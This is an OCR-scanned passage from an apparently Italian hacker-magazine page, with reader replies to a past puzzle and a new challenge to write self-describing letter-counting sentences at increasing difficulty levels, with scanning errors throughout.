righe" 

. logan57: "la soluzione è: attacca- 
re gli irriducibili galli alla ora 
sesta" 



Cassandra: "è stata una prova cari- 
na che mi ha fatto capire una cosa: 
maledizione perché non so pro- 
grammare?" 
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Pongramma: frase che si autodescriue nei termini 

dei caratteri che la compongono. 



"Questa frase contiene solo due lettere a". 
Pangramma di lineilo 1, neramente facilissimo 



"In queste uìrgolette si trovano tre a e una b". 
Pangramma di lineilo 2, molto facile 

"Qua dentro si contano otto uolte la a, una uol 
Pangramma di lineilo 3, facile 



La sfida! 







la e". 



Per totti: Che lineilo riesci a raggiungere? 

Per esperti: Riesci a creare un pangramma di lineilo 21, con tutte le lettere dell'alfabeto 

italiano (abcdefghilmnnpqrstuuz)? 

Per geni: Riesci a creare un pangramma di lineilo 26, con tutte le lettere dell'alfabeta inglese 

(abcdefghijklmnupqrstuuujHgz)? 

Per super hacker: Riesci a scriuere un programma per creare pangrammi di qualsiasi lineile? 



^H 



Le regole 



La frase è libera. 

I numeri denonn essere sempre scritti in lettere (se no non c'è gusto)! 

Le accentate contano come nncali normali (à conta come a, è conta come e eccetera). 



Pubblicheremo tutti! 

Scriueteci a guestbook@hackerjournaLi 

_ ,- mm 

hackerjournal.it 

il muro per i tuoi graffiti digitali 



